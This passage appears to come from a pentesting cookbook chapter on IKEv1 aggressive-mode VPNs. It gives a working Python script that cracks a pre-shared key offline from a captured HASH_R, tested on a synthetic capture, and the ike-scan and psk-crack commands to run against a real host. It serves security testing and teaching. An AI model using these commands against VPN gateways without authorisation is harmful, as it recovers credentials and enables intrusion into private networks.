Kali Linux:An Ethical Hacker's Cookbook

Pentesting VPNs with ike-scan

During a pentest we often come across VPN endpoints, but probing them for weaknesses and exploiting what we find is not a widely practised technique. IPsec VPN endpoints use the Internet Key Exchange (IKE) protocol to negotiate security associations between the two peers (the gateway and each client) before the VPN tunnel is established.

IKEv1 has two phases: phase 1 establishes a secure, authenticated channel between the two peers (the ISAKMP SA), and phase 2 uses that channel to negotiate the IPsec SAs that actually encrypt the tunnelled traffic.

Our focus here is phase 1, which can be run in one of two modes:

  • Main mode
  • Aggressive mode

We will hunt for VPN endpoints that accept aggressive mode with pre-shared key (PSK) authentication. In aggressive mode the responder's authentication hash (HASH_R, a keyed hash derived from the PSK) is sent unencrypted in the second message, whereas main mode only sends it inside the encrypted channel; anyone who captures an aggressive-mode exchange can therefore brute-force the PSK offline with a wordlist.
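To show why an aggressive-mode PSK endpoint is worth hunting for, here is an added example (not code from the book or from the ike-scan project) that reproduces the offline check psk-crack performs: recompute HASH_R for each candidate PSK from the values the responder sent in the clear and compare it with the HASH_R it actually sent. It follows RFC 2409 (SKEYID = prf(PSK, Ni_b | Nr_b); HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b), prf = HMAC with the negotiated hash). The nine colon-separated hex fields are assumed to be the layout ike-scan --pskcrack writes and psk-crack reads; the "capture" is constructed in the block with a known PSK, not real traffic.

```python
import hashlib
import hmac
import random

# IKEv1 prf is HMAC keyed with the phase-1 hash algorithm (RFC 2409 section 3.2).
PRF = {"md5": hashlib.md5, "sha1": hashlib.sha1}

# Assumed psk-crack input layout: nine colon-separated hex fields in this order.
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")


def hash_r(psk: bytes, p: dict, alg: str = "sha1") -> bytes:
    """Responder's HASH_R for pre-shared-key authentication (RFC 2409 section 5.4).

    Every input except the PSK travels unencrypted in aggressive mode, which is
    exactly what makes this value crackable offline.
    """
    digest = PRF[alg]
    skeyid = hmac.new(psk, p["ni_b"] + p["nr_b"], digest).digest()
    msg = (p["g_xr"] + p["g_xi"] + p["cky_r"] + p["cky_i"]
           + p["sai_b"] + p["idir_b"])
    return hmac.new(skeyid, msg, digest).digest()


def parse_pskcrack_line(line: str) -> dict:
    """Split one capture line into named byte strings (assumed ike-scan layout)."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return {name: bytes.fromhex(value) for name, value in zip(FIELDS, parts)}


def crack_psk(line: str, wordlist, alg: str = "sha1"):
    """Return the first wordlist entry whose HASH_R matches the captured one, else None."""
    p = parse_pskcrack_line(line)
    for candidate in wordlist:
        if hmac.compare_digest(hash_r(candidate.encode(), p, alg), p["hash_r"]):
            return candidate
    return None


def make_capture(psk: str, alg: str = "sha1", seed: int = 1) -> str:
    """Construct a synthetic aggressive-mode capture line with a known PSK.

    The Diffie-Hellman values, cookies, SA body and nonces are random filler
    (constructed test data); only HASH_R is computed the way a responder would.
    """
    rnd = random.Random(seed)

    def rb(n: int) -> bytes:
        return bytes(rnd.getrandbits(8) for _ in range(n))

    p = {
        "g_xr": rb(128), "g_xi": rb(128),      # DH group 2 public values (1024 bits)
        "cky_r": rb(8), "cky_i": rb(8),        # ISAKMP responder/initiator cookies
        "sai_b": rb(40),                       # body of the initiator's SA payload
        # ID payload body: type ID_FQDN (2), protocol 0, port 0, then the name
        "idir_b": b"\x02\x00\x00\x00" + b"vpn.example.test",
        "ni_b": rb(20), "nr_b": rb(20),        # initiator and responder nonces
    }
    p["hash_r"] = hash_r(psk.encode(), p, alg)
    return ":".join(p[f].hex() for f in FIELDS)


if __name__ == "__main__":
    capture = make_capture("Summer2023!")
    print(crack_psk(capture, ["password", "Summer2023!", "letmein"]))
```

Against a real target the capture line comes from `ike-scan -A -M --id=<group-name> --pskcrack=psk.txt <host>` and the equivalent dictionary attack is `psk-crack -d <wordlist> psk.txt`; the phase-1 hash algorithm to pass as `alg` is the `Hash=` value in ike-scan's transform output. The check is a single HMAC pair per candidate, so even a slow interpreter tests thousands of PSKs per second, which is why a dictionary PSK on an aggressive-mode endpoint should be reported as a finding.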